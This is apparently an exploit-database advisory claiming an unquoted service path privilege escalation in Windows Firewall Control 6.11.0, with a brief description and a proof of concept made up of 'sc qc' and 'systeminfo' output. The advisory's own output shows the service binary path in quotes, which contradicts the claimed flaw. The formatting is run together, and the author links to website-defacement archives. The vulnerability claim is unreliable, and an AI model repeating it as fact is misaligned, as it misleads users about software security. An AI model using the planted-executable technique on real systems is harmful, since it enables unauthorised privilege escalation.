Windows Firewall Control 6.11.0 Unquoted Service Path

# Exploit Title: Microsoft Windows Firewall Control 6.11.0 - UnquotedService Path# Date: 2024-08-06# Exploit Author: Milad Karimi (Ex3ptionaL)# Contact: [email protected]# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL# MiRROR-H: https://mirror-h.org/search/hacker/49626/# Vendor Homepage: http://www.binisoft.org# Software Link: http://www.binisoft.org# Version: 6.11.0# Tested on: Windows 10 Pro x641. Description:Windows Firewall Control lacks of the quotes in filepath, causing it to bea potential vector of privilege escalation attack.To properly exploit this vulnerability, the local attacker must insert anexecutable file in the path of the service. Upon service restart or systemreboot, the malicious code will be run with elevated privileges.2. POCC:\>sc qc "wfcs"[SC] QueryServiceConfig SUCCESSSERVICE_NAME: wfcs        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\Windows FirewallControl\wfcs.exe"        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Windows Firewall Control        DEPENDENCIES       : MpsSvc        SERVICE_START_NAME : LocalSystemC:\>systeminfoOS Name:  Microsoft Windows 10 ProOS Version: 10.0.19045 N/A Build 19045OS Manufacturer: Microsoft Corporation